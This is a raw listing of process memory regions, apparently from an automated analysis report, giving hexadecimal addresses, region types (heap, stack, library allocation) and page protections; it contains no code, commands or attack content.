288CCDAB000
heap
page read and write
20187935000
heap
page read and write
1EE96F40000
heap
page read and write
12EBDF13000
trusted library allocation
page read and write
4620FE000
stack
page read and write
237B3783000
trusted library allocation
page read and write
C806EFE000
stack
page read and write
2159CCCD000
heap
page read and write
2C445550000
heap
page execute and read and write
3FC09FF000
stack
page read and write
EEE0E7E000
stack
page read and write
206945DC000
heap
page read and write
22D54830000
heap
page execute and read and write
2276BFBD000
heap
page read and write
206945F5000
heap
page read and write
22A5F3EE000
heap
page read and write
2C445CA9000
trusted library allocation
page read and write
22A5F40B000
heap
page read and write
251FD3B4000
heap
page read and write
C806DFF000
stack
page read and write
23FDC2CA000
heap
page read and write
1E079FE0000
heap
page read and write
745B94E000
stack
page read and write
258D396E000
heap
page read and write
21B617A0000
heap
page read and write
1EC82E50000
trusted library allocation
page read and write
21701BE5000
trusted library allocation
page read and write
212F3F60000
heap
page read and write
314F000
stack
page read and write
12EBDA73000
trusted library allocation
page read and write
21B61884000
heap
page read and write
288CCB7C000
heap
page read and write
1E07BF3B000
heap
page read and write
7FF7B37C2000
trusted library allocation
page read and write
212F3EA0000
heap
page read and write
23FDC33B000
heap
page read and write
461BFE000
stack
page read and write
1C5158E0000
heap
page execute and read and write
1EC85E0B000
trusted library allocation
page read and write
1EE88FE000
stack
page read and write
7FF7B39F0000
trusted library allocation
page read and write
258D396E000
heap
page read and write
1AF16FBF000
heap
page read and write
4A3743E000
stack
page read and write
377967F000
stack
page read and write
212F3BD8000
heap
page read and write
7FF6819E1000
unkown
page execute read
288CAC4A000
heap
page read and write
258D3968000
heap
page read and write
1EE96E18000
heap
page read and write
1E07BF9D000
heap
page read and write
22C26CE6000
heap
page read and write
1E07B792000
heap
page read and write
7FF7B39C0000
trusted library allocation
page execute and read and write
1EC85099000
trusted library allocation
page read and write
12EBB969000
heap
page read and write
2159CF59000
heap
page read and write
214A9BA0000
heap
page read and write
7FF7B39B0000
trusted library allocation
page execute and read and write
180C4DE8000
heap
page read and write
1EC82EFB000
heap
page read and write
251FD3E2000
heap
page read and write
1EE96F73000
heap
page read and write
7FF7B3960000
trusted library allocation
page read and write
1F0D3A8B000
trusted library allocation
page read and write
38D68B9000
stack
page read and write
22C26CA8000
heap
page read and write
2276E132000
heap
page read and write
160927B1000
trusted library allocation
page read and write
1C0CB490000
heap
page readonly
22D54987000
trusted library allocation
page read and write
1AF1A9A2000
trusted library allocation
page read and write
2069466D000
heap
page read and write
2D85000
trusted library allocation
page read and write
20187A41000
heap
page read and write
21B615E8000
heap
page read and write
21700001000
trusted library allocation
page read and write
180C46A6000
heap
page read and write
23FDC5C1000
heap
page read and write
201877E8000
heap
page read and write
203DCBE0000
trusted library allocation
page read and write
1F0D362E000
trusted library allocation
page read and write
203DED20000
trusted library allocation
page read and write
21B6162A000
heap
page read and write
21B61849000
heap
page read and write
212F3BF3000
heap
page read and write
217016C3000
trusted library allocation
page read and write
953CDFE000
stack
page read and write
2159AC70000
heap
page read and write
7FF7B3B31000
trusted library allocation
page read and write
20187780000
heap
page read and write
22C26BC2000
heap
page read and write
22A5F0AD000
heap
page read and write
258D3A01000
heap
page read and write
212F1D64000
heap
page read and write
1EE96C99000
heap
page read and write
2159CCD8000
heap
page read and write
1C0CB9B0000
heap
page execute and read and write
1EE96E18000
heap
page read and write
12752FB0000
trusted library allocation
page read and write
21B61616000
heap
page read and write
D977A7E000
stack
page read and write
21B615A9000
heap
page read and write
377A58E000
stack
page read and write
7DF047E000
stack
page read and write
BBB66BF000
stack
page read and write
1AF18C40000
trusted library allocation
page read and write
20694693000
heap
page read and write
1EE96D06000
heap
page read and write
288CCD00000
heap
page read and write
946727F000
stack
page read and write
288CCB0C000
heap
page read and write
20694658000
heap
page read and write
288CCD9B000
heap
page read and write
1AF310E0000
heap
page read and write
237B3BAE000
trusted library allocation
page read and write
160828C1000
trusted library allocation
page read and write
1EE94DE6000
heap
page read and write
1EC86176000
trusted library allocation
page read and write
203DCC20000
trusted library allocation
page read and write
7FF681BFE000
unkown
page write copy
D977CFE000
stack
page read and write
20694510000
heap
page read and write
791CDFE000
stack
page read and write
7DF134E000
stack
page read and write
21B6151D000
heap
page read and write
20187A2A000
heap
page read and write
D6C4A7F000
stack
page read and write
1968007C000
trusted library allocation
page read and write
180C4DE9000
heap
page read and write
F9E000
stack
page read and write
288CCDB4000
heap
page read and write
288CCA6D000
heap
page read and write
251FD59A000
heap
page read and write
EEE09DF000
stack
page read and write
23FDC2D4000
heap
page read and write
946830E000
stack
page read and write
288CCA02000
heap
page read and write
946773E000
stack
page read and write
23FDC428000
heap
page read and write
7FF7B3A20000
trusted library allocation
page read and write
251FD754000
heap
page read and write
791C34A000
stack
page read and write
1D93DCE0000
heap
page execute and read and write
DF0000
trusted library allocation
page read and write
288CCDB6000
heap
page read and write
1E07BF5E000
heap
page read and write
22A5F03A000
heap
page read and write
212F3BC3000
heap
page read and write
160827FA000
trusted library allocation
page read and write
2069462F000
heap
page read and write
20694585000
heap
page read and write
2276E02A000
heap
page read and write
1276B609000
heap
page read and write
2018790B000
heap
page read and write
16D0000
trusted library allocation
page read and write
BBB6537000
stack
page read and write
12EBD9E0000
heap
page read and write
503A1FF000
stack
page read and write
1EE94DBB000
heap
page read and write
1AF1A3AC000
trusted library allocation
page read and write
22C26CDD000
heap
page read and write
251FD3CA000
heap
page read and write
12F7000
stack
page read and write
1D956080000
heap
page read and write
E2A000
trusted library allocation
page execute and read and write
258D3A38000
heap
page read and write
251FD41E000
heap
page read and write
288CCA03000
heap
page read and write
251FD413000
heap
page read and write
22A5F039000
heap
page read and write
7FF7B39D2000
trusted library allocation
page read and write
251FD4FD000
heap
page read and write
1EC82C87000
heap
page read and write
258D393B000
heap
page read and write
23FDA4B3000
heap
page read and write
2276E15B000
heap
page read and write
251FD50D000
heap
page read and write
1EE96CD5000
heap
page read and write
182D17CB000
heap
page read and write
2069467F000
heap
page read and write
1275348C000
trusted library allocation
page read and write
21B614B2000
heap
page read and write
16082B6E000
trusted library allocation
page read and write
1EC82C4D000
heap
page read and write
461B7F000
stack
page read and write
2A2E000
stack
page read and write
2276E276000
heap
page read and write
1E07BD9A000
heap
page read and write
791CFFB000
stack
page read and write
212F3F3B000
heap
page read and write
2276DFB1000
heap
page read and write
2C445950000
heap
page execute and read and write
1EE8979000
stack
page read and write
1EE96CDD000
heap
page read and write
953D2FE000
stack
page read and write
258D3968000
heap
page read and write
22A5F066000
heap
page read and write
21B61960000
heap
page read and write
791CEFF000
stack
page read and write
1D93BDA1000
heap
page read and write
251FD514000
heap
page read and write
237B1909000
heap
page read and write
1AF18C10000
trusted library allocation
page read and write
7FF7B3A80000
trusted library allocation
page read and write
7FF7B37E0000
trusted library allocation
page read and write
20694655000
heap
page read and write
22D6C888000
heap
page read and write
2159CF91000
heap
page read and write
28173BA000
stack
page read and write
2069465F000
heap
page read and write
7FF7B3AB0000
trusted library allocation
page read and write
258D3940000
heap
page read and write
7DF08FB000
stack
page read and write
22A5F16D000
heap
page read and write
180C4BB4000
heap
page read and write
22A5F0AE000
heap
page read and write
21B614B7000
heap
page read and write
202B06C0000
heap
page read and write
7FF7B3B30000
trusted library allocation
page read and write
7FF7B37D4000
trusted library allocation
page read and write
2276BFA8000
heap
page read and write
251FD3D1000
heap
page read and write
206945DF000
heap
page read and write
14BF9FF000
stack
page read and write
1EE96D06000
heap
page read and write
258D3953000
heap
page read and write
1E07B7B0000
heap
page read and write
2276E14E000
heap
page read and write
21B615CD000
heap
page read and write
20694663000
heap
page read and write
B88CD8D000
stack
page read and write
1AF1A398000
trusted library allocation
page read and write
1E079C98000
heap
page read and write
21B614EB000
heap
page read and write
88BAB2C000
stack
page read and write
258D1B7D000
heap
page read and write
7FF7B3910000
trusted library allocation
page execute and read and write
182D1898000
heap
page read and write
1C5151A0000
heap
page read and write
7FF7B3A50000
trusted library allocation
page read and write
237B191D000
heap
page read and write
21B6172A000
heap
page read and write
D6C4F3D000
stack
page read and write
1EE96BDB000
heap
page read and write
180C46D1000
heap
page read and write
2276E131000
heap
page read and write
2276C03A000
heap
page read and write
6B3F0FF000
stack
page read and write
206945B6000
heap
page read and write
1EE96F0E000
heap
page read and write
258D3CC3000
heap
page read and write
7FF7B3B20000
trusted library allocation
page read and write
6B3FC4D000
stack
page read and write
288CCA44000
heap
page read and write
21B614F2000
heap
page read and write
182D17B8000
heap
page read and write
1EE94D3E000
heap
page read and write
1EE94D29000
heap
page read and write
1F0D3250000
heap
page read and write
7FF7B3B48000
trusted library allocation
page read and write
22D5289A000
heap
page read and write
251FD4E8000
heap
page read and write
7FF7B3910000
trusted library allocation
page execute and read and write
1F0D3673000
trusted library allocation
page read and write
4621FC000
stack
page read and write
1C5158F1000
trusted library allocation
page read and write
182D17C3000
heap
page read and write
202B06D2000
heap
page read and write
1AF192E1000
trusted library allocation
page read and write
23FDC2C1000
heap
page read and write
21B61731000
heap
page read and write
217003D0000
trusted library allocation
page read and write
7DF067E000
stack
page read and write
2276DFA1000
heap
page read and write
180C4D36000
heap
page read and write
23FDC675000
heap
page read and write
127530F0000
heap
page read and write
6B3EEFE000
stack
page read and write
7FF7B39D2000
trusted library allocation
page read and write
4A372BC000
stack
page read and write
21B5F747000
heap
page read and write
258D3967000
heap
page read and write
12EBDC82000
trusted library allocation
page read and write
7FF7B39AA000
trusted library allocation
page read and write
2C443992000
heap
page read and write
180C4EFE000
heap
page read and write
2159CF3C000
heap
page read and write
BBB63FE000
stack
page read and write
203DC976000
heap
page read and write
20694659000
heap
page read and write
23FDC439000
heap
page read and write
1EC82C41000
heap
page read and write
1AF18CF1000
trusted library allocation
page read and write
212F3BB3000
heap
page read and write
237B33B5000
heap
page read and write
1EE96B90000
heap
page read and write
2069465F000
heap
page read and write
23FDC317000
heap
page read and write
1C0C9A40000
heap
page read and write
22D54C50000
trusted library allocation
page read and write
2276DF07000
heap
page read and write
D6C4CFE000
stack
page read and write
BC55B79000
stack
page read and write
1E07BF4D000
heap
page read and write
7FF7B3A30000
trusted library allocation
page read and write
16082D73000
trusted library allocation
page read and write
258D3BF1000
heap
page read and write
23FDC2D2000
heap
page read and write
7FF7B3A50000
trusted library allocation
page read and write
745B8CE000
stack
page read and write
288CCB48000
heap
page read and write
214A9CBA000
heap
page read and write
1EC82E30000
trusted library allocation
page read and write
237B32A0000
trusted library allocation
page read and write
20694651000
heap
page read and write
21B5F7E6000
heap
page read and write
1E07BF5F000
heap
page read and write
1F0D12E9000
heap
page read and write
22C26CFA000
heap
page read and write
147E000
stack
page read and write
BBB617F000
stack
page read and write
1E07BCED000
heap
page read and write
E3B000
trusted library allocation
page execute and read and write
1F0D11D0000
heap
page read and write
2817FFB000
stack
page read and write
180C471E000
heap
page read and write
288CCB01000
heap
page read and write
12751679000
heap
page read and write
7FF7B37FD000
trusted library allocation
page execute and read and write
12EBB8A0000
heap
page read and write
2069466D000
heap
page read and write
251FD6A1000
heap
page read and write
FBB000
stack
page read and write
21B5F7F3000
heap
page read and write
2276E252000
heap
page read and write
1EC84E64000
trusted library allocation
page read and write
288CCA5C000
heap
page read and write
1609A9A7000
heap
page execute and read and write
2276E15B000
heap
page read and write
212F3E27000
heap
page read and write
2C445EC0000
trusted library allocation
page read and write
64771FF000
stack
page read and write
258D3CC3000
heap
page read and write
7DF49EF70000
trusted library allocation
page execute and read and write
16EA000
trusted library allocation
page execute and read and write
1D93D880000
heap
page read and write
2159AEC0000
heap
page read and write
12751600000
heap
page read and write
1EE96BF2000
heap
page read and write
23FDC5B6000
heap
page read and write
7FF7B38D6000
trusted library allocation
page execute and read and write
1EE96E38000
heap
page read and write
2276E292000
heap
page read and write
258D1A40000
heap
page read and write
38D67BE000
stack
page read and write
7FF7B37F3000
trusted library allocation
page execute and read and write
1276B750000
heap
page read and write
22A5F4EF000
heap
page read and write
1E07B7F7000
heap
page read and write
1609A84B000
heap
page read and write
206945F2000
heap
page read and write
288CABCE000
heap
page read and write
22A5F4EE000
heap
page read and write
1EC8612E000
trusted library allocation
page read and write
20185730000
heap
page read and write
180C4713000
heap
page read and write
12753441000
trusted library allocation
page read and write
1E07B7D7000
heap
page read and write
251FB5C0000
heap
page read and write
14BF7FD000
stack
page read and write
1AF190BF000
trusted library allocation
page read and write
EEE11FE000
stack
page read and write
258D3918000
heap
page read and write
1D93BE5B000
heap
page read and write
1EE96C9C000
heap
page read and write
F2567FE000
stack
page read and write
212F3F6D000
heap
page read and write
21B6162A000
heap
page read and write
1AF31154000
heap
page read and write
258D1ADE000
heap
page read and write
E14000
trusted library allocation
page read and write
1D94DD00000
trusted library allocation
page read and write
7FF7B38AC000
trusted library allocation
page execute and read and write
288CCA7E000
heap
page read and write
258D3A6A000
heap
page read and write
7FF681C03000
unkown
page readonly
D6C513B000
stack
page read and write
1EC84E4F000
trusted library allocation
page read and write
BC55A7E000
stack
page read and write
180C2C68000
heap
page read and write
21B5F6F0000
heap
page read and write
1275166B000
heap
page read and write
1C513830000
heap
page read and write
1E07BD19000
heap
page read and write
180C2ED0000
heap
page read and write
1C0C9A71000
heap
page read and write
1E07BF4A000
heap
page read and write
214A9F10000
trusted library allocation
page read and write
214AC13B000
trusted library allocation
page read and write
318E000
stack
page read and write
180C471E000
heap
page read and write
53DD13E000
stack
page read and write
212F1C98000
heap
page read and write
12EBDEFF000
trusted library allocation
page read and write
251FD3AB000
heap
page read and write
212F3F6D000
heap
page read and write
1E07BE96000
heap
page read and write
206945CF000
heap
page read and write
180C4BAD000
heap
page read and write
258D38F3000
heap
page read and write
22A5F082000
heap
page read and write
2276DF1D000
heap
page read and write
251FD40F000
heap
page read and write
953D0FD000
stack
page read and write
2276DF02000
heap
page read and write
180C46D6000
heap
page read and write
21B61846000
heap
page read and write
258D396E000
heap
page read and write
258D3913000
heap
page read and write
212F3E25000
heap
page read and write
377947F000
stack
page read and write
2069462F000
heap
page read and write
251FD3F7000
heap
page read and write
1AF16EE0000
heap
page read and write
3195000
trusted library allocation
page read and write
288CCDC0000
heap
page read and write
20185836000
heap
page read and write
20694665000
heap
page read and write
258D3CA7000
heap
page read and write
288CCD01000
heap
page read and write
180C46A0000
heap
page read and write
2276E149000
heap
page read and write
251FD4C8000
heap
page read and write
D6C4742000
stack
page read and write
288CCA53000
heap
page read and write
19680013000
trusted library allocation
page read and write
21700633000
trusted library allocation
page read and write
21B6162A000
heap
page read and write
22D528BF000
heap
page read and write
2159D04E000
heap
page read and write
46217E000
stack
page read and write
AC7FEFE000
stack
page read and write
288CCB81000
heap
page read and write
DC0000
heap
page read and write
7FF7B3AC0000
trusted library allocation
page read and write
203DCBB0000
trusted library allocation
page read and write
212F3D08000
heap
page read and write
53DCDFE000
stack
page read and write
7FF7B3B10000
trusted library allocation
page read and write
212F3BE8000
heap
page read and write
21B6162A000
heap
page read and write
1EC849E0000
trusted library allocation
page read and write
1D93DD3B000
trusted library allocation
page read and write
4F70000
heap
page read and write
1E07B799000
heap
page read and write
22C26BD7000
heap
page read and write
1760000
heap
page read and write
2069462D000
heap
page read and write
22D52820000
heap
page read and write
20187913000
heap
page read and write
21B615A0000
heap
page read and write
CAB30FF000
stack
page read and write
180C4E3D000
heap
page read and write
1E07B793000
heap
page read and write
1608291C000
trusted library allocation
page read and write
2069465B000
heap
page read and write
22A5D3B5000
heap
page read and write
22A5D1EA000
heap
page read and write
1C513927000
heap
page read and write
20187A41000
heap
page read and write
23FDC33D000
heap
page read and write
127515C0000
heap
page read and write
22C26CFA000
heap
page read and write
1E07BF72000
heap
page read and write
1608290D000
trusted library allocation
page read and write
2159CC90000
heap
page read and write
182D18E8000
heap
page read and write
214A9F40000
heap
page read and write
180C2C76000
heap
page read and write
1E07B80B000
heap
page read and write
212F3E34000
heap
page read and write
B88BCFD000
stack
page read and write
22D54335000
heap
page read and write
1E07BD0D000
heap
page read and write
7FF7B3A10000
trusted library allocation
page read and write
1E07BCE8000
heap
page read and write
22A5F131000
heap
page read and write
2069462D000
heap
page read and write
20694550000
remote allocation
page read and write
214A9D03000
heap
page read and write
251FD76E000
heap
page read and write
21B61739000
heap
page read and write
1E07BF1E000
heap
page read and write
2276BF60000
heap
page read and write
288CCB7D000
heap
page read and write
206945E0000
heap
page read and write
94677BF000
stack
page read and write
2F6E1B8000
stack
page read and write
182D18C8000
heap
page read and write
4A36F7E000
stack
page read and write
1EE96BA7000
heap
page read and write
1AF311B7000
heap
page read and write
7FF7B398A000
trusted library allocation
page read and write
EEE1DCD000
stack
page read and write
2018787A000
heap
page read and write
23FDA5D0000
heap
page read and write
F2561AA000
stack
page read and write
23FDC673000
heap
page read and write
21B5F7F7000
heap
page read and write
22A5F22A000
heap
page read and write
212F3CBD000
heap
page read and write
16F7000
trusted library allocation
page execute and read and write
203DEF81000
trusted library allocation
page read and write
2159CCAD000
heap
page read and write
251FD3A3000
heap
page read and write
212F3BF3000
heap
page read and write
20187A1B000
heap
page read and write
2170169D000
trusted library allocation
page read and write
251FD59C000
heap
page read and write
23FDC4BA000
heap
page read and write
461F79000
stack
page read and write
288CAC4A000
heap
page read and write
258D1AEF000
heap
page read and write
203DF0D6000
trusted library allocation
page read and write
20694659000
heap
page read and write
182D188D000
heap
page read and write
201877ED000
heap
page read and write
212F3CCD000
heap
page read and write
2276E35F000
heap
page read and write
461E79000
stack
page read and write
2F6DEFE000
stack
page read and write
44D1AFE000
stack
page read and write
182D1888000
heap
page read and write
294E000
stack
page read and write
22C26B87000
heap
page read and write
1AF18810000
trusted library allocation
page read and write
180C46AB000
heap
page read and write
251FB7C0000
heap
page read and write
1EE96F3A000
heap
page read and write
258D3C8B000
heap
page read and write
212F3CB1000
heap
page read and write
1AF18830000
trusted library allocation
page read and write
2276E285000
heap
page read and write
1EE94CD0000
heap
page read and write
1AF1A393000
trusted library allocation
page read and write
22D54981000
trusted library allocation
page read and write
1C513877000
heap
page read and write
251FD76E000
heap
page read and write
180C4C3A000
heap
page read and write
7FF7B37F2000
trusted library allocation
page read and write
23FDC312000
heap
page read and write
1E07BF54000
heap
page read and write
1EE96F73000
heap
page read and write
203DF0DF000
trusted library allocation
page read and write
23FDA417000
heap
page read and write
16080760000
heap
page read and write
B88BEF9000
stack
page read and write
EEE117E000
stack
page read and write
1C0C9AE7000
heap
page read and write
1D93E390000
trusted library allocation
page read and write
288CCA6B000
heap
page read and write
2159CD09000
heap
page read and write
2018768A000
heap
page read and write
2069462D000
heap
page read and write
7FF7B397A000
trusted library allocation
page read and write
180C4702000
heap
page read and write
288CCB85000
heap
page read and write
BBB637E000
stack
page read and write
7FF7B39C0000
trusted library allocation
page read and write
22A5F0AE000
heap
page read and write
B88BDFE000
stack
page read and write
203DED90000
trusted library allocation
page read and write
22D52A50000
heap
page read and write
251FD85E000
heap
page read and write
7FF7B3A6C000
trusted library allocation
page read and write
7FF7B388C000
trusted library allocation
page execute and read and write
D6C4C7E000
stack
page read and write
1E07BF72000
heap
page read and write
B88BD7E000
stack
page read and write
2159CC0E000
heap
page read and write
1F0D364B000
trusted library allocation
page read and write
C8073FB000
stack
page read and write
22A5F03B000
heap
page read and write
201876F6000
heap
page read and write
288CCA43000
heap
page read and write
2276DF1D000
heap
page read and write
258D1AE5000
heap
page read and write
1E07BE96000
heap
page read and write
7FF7B39E0000
trusted library allocation
page execute and read and write
1EE96B94000
heap
page read and write
1EE9704F000
heap
page read and write
1C515250000
heap
page read and write
2C445B03000
trusted library allocation
page read and write
22C26C71000
heap
page read and write
20187980000
heap
page read and write
7DF02FE000
stack
page read and write
2159CC03000
heap
page read and write
1D93BDE1000
heap
page read and write
180C46A5000
heap
page read and write
251FD4A0000
heap
page read and write
2159CBF7000
heap
page read and write
21B61739000
heap
page read and write
22A5F158000
heap
page read and write
1D955ED6000
heap
page read and write
20694600000
heap
page read and write
1AF1A656000
trusted library allocation
page read and write
258D396C000
heap
page read and write
3FC0BFE000
stack
page read and write
2069462D000
heap
page read and write
1EE94D35000
heap
page read and write
23FDC2C5000
heap
page read and write
258D3CA0000
heap
page read and write
206945F3000
heap
page read and write
251FD756000
heap
page read and write
1EE96F3E000
heap
page read and write
201876D2000
heap
page read and write
258D1AEC000
heap
page read and write
23FDC302000
heap
page read and write
22A5D155000
heap
page read and write
237B190D000
heap
page read and write
44D17FD000
stack
page read and write
2159CBC6000
heap
page read and write
1AF16F35000
heap
page read and write
258D3948000
heap
page read and write
745A8FF000
stack
page read and write
212F1CC5000
heap
page read and write
7FF7B3B53000
trusted library allocation
page read and write
6B3EBFF000
stack
page read and write
127634BB000
trusted library allocation
page read and write
21B614F7000
heap
page read and write
20694680000
heap
page read and write
1C0CC05B000
trusted library allocation
page read and write
212F3C1E000
heap
page read and write
AC005BC000
stack
page read and write
212F3F7B000
heap
page read and write
1F0D3643000
trusted library allocation
page read and write
1EE96D1A000
heap
page read and write
251FD416000
heap
page read and write
1276B6A0000
heap
page execute and read and write
127515C5000
heap
page read and write
AC7FF7C000
stack
page read and write
201857F5000
heap
page read and write
206945CF000
heap
page read and write
7FF7B3B10000
trusted library allocation
page read and write
1E07BF49000
heap
page read and write
1040000
heap
page read and write
251FD4A1000
heap
page read and write
1EC864D8000
trusted library allocation
page read and write
23FDC3ED000
heap
page read and write
201877C5000
heap
page read and write
22C26CB5000
heap
page read and write
4617DE000
stack
page read and write
1EE94DE4000
heap
page read and write
237B18D2000
heap
page read and write
21B6187D000
heap
page read and write
2F6DE7D000
stack
page read and write
E37000
trusted library allocation
page execute and read and write
212F3F4E000
heap
page read and write
3D81000
trusted library allocation
page read and write
6B3FBCF000
stack
page read and write
22C26BED000
heap
page read and write
791C9FE000
stack
page read and write
22C26CEB000
heap
page read and write
1EE96E1E000
heap
page read and write
7FF7B39E0000
trusted library allocation
page read and write
21B6175B000
heap
page read and write
21B614A2000
heap
page read and write
288CABBF000
heap
page read and write
21B6184A000
heap
page read and write
22A5F3D9000
heap
page read and write
7FF7B3990000
trusted library allocation
page execute and read and write
22D548C4000
trusted library allocation
page read and write
237B3701000
trusted library allocation
page read and write
1D955E26000
heap
page execute and read and write
2069462D000
heap
page read and write
377A68D000
stack
page read and write
251FD4CD000
heap
page read and write
21B5F7E5000
heap
page read and write
2C4438A0000
heap
page read and write
212F3CFD000
heap
page read and write
12753556000
trusted library allocation
page read and write
7FF7B3A10000
trusted library allocation
page read and write
7FF7B3A90000
trusted library allocation
page read and write
237B3C53000
trusted library allocation
page read and write
BC55D7E000
stack
page read and write
1F0D133C000
heap
page read and write
237B3D5C000
trusted library allocation
page read and write
288CCA18000
heap
page read and write
1608092D000
heap
page read and write
1F0D1367000
heap
page read and write
12EBDF42000
trusted library allocation
page read and write
258D3938000
heap
page read and write
212F3FA1000
heap
page read and write
212F3D15000
heap
page read and write
2276E01D000
heap
page read and write
22A5F3FB000
heap
page read and write
258D391C000
heap
page read and write
212F3CDD000
heap
page read and write
288CCB3D000
heap
page read and write
2276DF1C000
heap
page read and write
258D1A30000
heap
page read and write
2159CCED000
heap
page read and write
EF1EDFE000
stack
page read and write
127534DC000
trusted library allocation
page read and write
D9778FF000
stack
page read and write
1D955F0B000
heap
page read and write
212F3C1E000
heap
page read and write
1C0CBE44000
trusted library allocation
page read and write
16FB000
trusted library allocation
page execute and read and write
2276E23B000
heap
page read and write
20694661000
heap
page read and write
EEE091F000
stack
page read and write
1AF1962C000
trusted library allocation
page read and write
214ABC8C000
trusted library allocation
page read and write
21B6160D000
heap
page read and write
182D18DB000
heap
page read and write
217003DA000
trusted library allocation
page read and write
4A373B8000
stack
page read and write
12EBBC40000
heap
page read and write
180C4DFE000
heap
page read and write
E03000
trusted library allocation
page execute and read and write
251FD76E000
heap
page read and write
22C26B71000
heap
page read and write
2159CB99000
heap
page read and write
1E07B80E000
heap
page read and write
56FF000
stack
page read and write
1EE94D36000
heap
page read and write
23FDC2C2000
heap
page read and write
D6C4AFE000
stack
page read and write
160808F0000
heap
page read and write
288CCB79000
heap
page read and write
1E07BF56000
heap
page read and write
212F3D25000
heap
page read and write
180C4B88000
heap
page read and write
1D955E66000
heap
page read and write
1D93BDE6000
heap
page read and write
203DE9D0000
trusted library allocation
page read and write
1D93E2B2000
trusted library allocation
page read and write
22A5D0E0000
heap
page read and write
180C46A2000
heap
page read and write
180C4B78000
heap
page read and write
2159CD8A000
heap
page read and write
FED000
stack
page read and write
4E7E000
stack
page read and write
2159CB96000
heap
page read and write
7FF7B39F0000
trusted library allocation
page read and write
1FC8040F000
trusted library allocation
page read and write
7FF7B39F0000
trusted library allocation
page read and write
12EBD510000
heap
page read and write
53DDE8D000
stack
page read and write
1EE96BC2000
heap
page read and write
22A5F1A4000
heap
page read and write
2069465F000
heap
page read and write
2276DF1D000
heap
page read and write
22D52AC0000
heap
page readonly
180C4E0B000
heap
page read and write
38D61CF000
stack
page read and write
22D542F0000
trusted library allocation
page read and write
217016C8000
trusted library allocation
page read and write
214A9F45000
heap
page read and write
53DCE7E000
stack
page read and write
1D93E1A4000
trusted library allocation
page read and write
2159CB90000
heap
page read and write
2F6DD7F000
stack
page read and write
BBB62FE000
stack
page read and write
2159CCA1000
heap
page read and write
1C0CB480000
trusted library allocation
page read and write
203DC9A2000
heap
page read and write
1AF310FE000
heap
page read and write
212F3F53000
heap
page read and write
1EE96E18000
heap
page read and write
12753A03000
trusted library allocation
page read and write
23FDC307000
heap
page read and write
22A5F0A3000
heap
page read and write
180C4BB9000
heap
page read and write
1EE94DBB000
heap
page read and write
2170062D000
trusted library allocation
page read and write
214ABB70000
heap
page execute and read and write
127515D0000
heap
page read and write
1EE96D0D000
heap
page read and write
1C5137E0000
heap
page read and write
1E07B7BA000
heap
page read and write
1C5137B0000
heap
page read and write
214ABB81000
trusted library allocation
page read and write
1AF30EB4000
heap
page read and write
180C46C6000
heap
page read and write
21B614E7000
heap
page read and write
22D5289C000
heap
page read and write
2069468F000
heap
page read and write
1340000
heap
page read and write
23FDC327000
heap
page read and write
214AB705000
heap
page read and write
258D3908000
heap
page read and write
791CCFD000
stack
page read and write
12EBBB90000
trusted library allocation
page read and write
23FDC66E000
heap
page read and write
12EBBB40000
trusted library allocation
page read and write
214ABC0B000
trusted library allocation
page read and write
1C0CC060000
trusted library allocation
page read and write
1AF1A8D8000
trusted library allocation
page read and write
258D3BF0000
heap
page read and write
258D3A0D000
heap
page read and write
94676B9000
stack
page read and write
16E0000
trusted library allocation
page read and write
AC9B7FB000
stack
page read and write
22A5F030000
heap
page read and write
C76000
heap
page read and write
2159CD04000
heap
page read and write
1D93DE34000
trusted library allocation
page read and write
288CCA48000
heap
page read and write
23FDC2F1000
heap
page read and write
2276C05A000
heap
page read and write
22C26BDA000
heap
page read and write
288CABBA000
heap
page read and write
23FDC42D000
heap
page read and write
2276DEAB000
heap
page read and write
182D1778000
heap
page read and write
1EE96E4B000
heap
page read and write
23FDC2F6000
heap
page read and write
20187A2E000
heap
page read and write
2276E148000
heap
page read and write
2C445A0E000
heap
page read and write
16080A20000
trusted library allocation
page read and write
EEE0C7E000
stack
page read and write
1EE8BBE000
stack
page read and write
258D3A2D000
heap
page read and write
20187A4D000
heap
page read and write
182D18D8000
heap
page read and write
1E07B79B000
heap
page read and write
1D93DDED000
trusted library allocation
page read and write
1609AAB0000
heap
page read and write
20187935000
heap
page read and write
202B06FE000
heap
page read and write
168F000
stack
page read and write
214ABBC0000
trusted library allocation
page read and write
1AF1A5D0000
trusted library allocation
page read and write
23FDC4BA000
heap
page read and write
2276E139000
heap
page read and write
22D528A6000
heap
page read and write
21B5F560000
heap
page read and write
203DED39000
trusted library allocation
page read and write
1F0D32E1000
trusted library allocation
page read and write
212F3E43000
heap
page read and write
182D1780000
heap
page read and write
E04000
trusted library allocation
page read and write
20187902000
heap
page read and write
1F0D307C000
heap
page read and write
212F1FC5000
heap
page read and write
21B5F710000
heap
page read and write
1276B970000
heap
page read and write
1F0D3639000
trusted library allocation
page read and write
258D1B7E000
heap
page read and write
1D93DD4F000
trusted library allocation
page read and write
1D955EB4000
heap
page read and write
288CCD7E000
heap
page read and write
2069462F000
heap
page read and write
22A5F40B000
heap
page read and write
1D93DDF0000
trusted library allocation
page read and write
20187A41000
heap
page read and write
20187906000
heap
page read and write
21B5F7CC000
heap
page read and write
573D000
stack
page read and write
1EE96B9B000
heap
page read and write
953CBFF000
stack
page read and write
22A5F044000
heap
page read and write
14B0000
heap
page read and write
2159AD70000
heap
page read and write
258D3923000
heap
page read and write
202B0660000
heap
page read and write
745AD7F000
stack
page read and write
1E07BCE8000
heap
page read and write
1870000
trusted library allocation
page execute and read and write
1F0D3878000
trusted library allocation
page read and write
182D18D4000
heap
page read and write
23FDC2F1000
heap
page read and write
22C26C9D000
heap
page read and write
1E07B80E000
heap
page read and write
1C0CBE18000
trusted library allocation
page read and write
180C4B7D000
heap
page read and write
23FDC3DD000
heap
page read and write
2276E254000
heap
page read and write
2069462D000
heap
page read and write
237B18C9000
heap
page read and write
214ABB91000
trusted library allocation
page read and write
20187683000
heap
page read and write
22C26BBB000
heap
page read and write
258D3DAF000
heap
page read and write
22A5F3EF000
heap
page read and write
7FF7B39B0000
trusted library allocation
page execute and read and write
21B6172C000
heap
page read and write
1AF28CF1000
trusted library allocation
page read and write
1AF311B5000
heap
page read and write
1EC84E93000
trusted library allocation
page read and write
2276DEC2000
heap
page read and write
22C26BA2000
heap
page read and write
2F6EE0E000
stack
page read and write
377A60E000
stack
page read and write
1EC86166000
trusted library allocation
page read and write
1D93E0EC000
trusted library allocation
page read and write
22C26BED000
heap
page read and write
182D1788000
heap
page read and write
160828C4000
trusted library allocation
page read and write
7FF7B37C3000
trusted library allocation
page execute and read and write
4A3753E000
stack
page read and write
F2565FE000
stack
page read and write
23FDC312000
heap
page read and write
1C0C9AA7000
heap
page read and write
288CABB9000
heap
page read and write
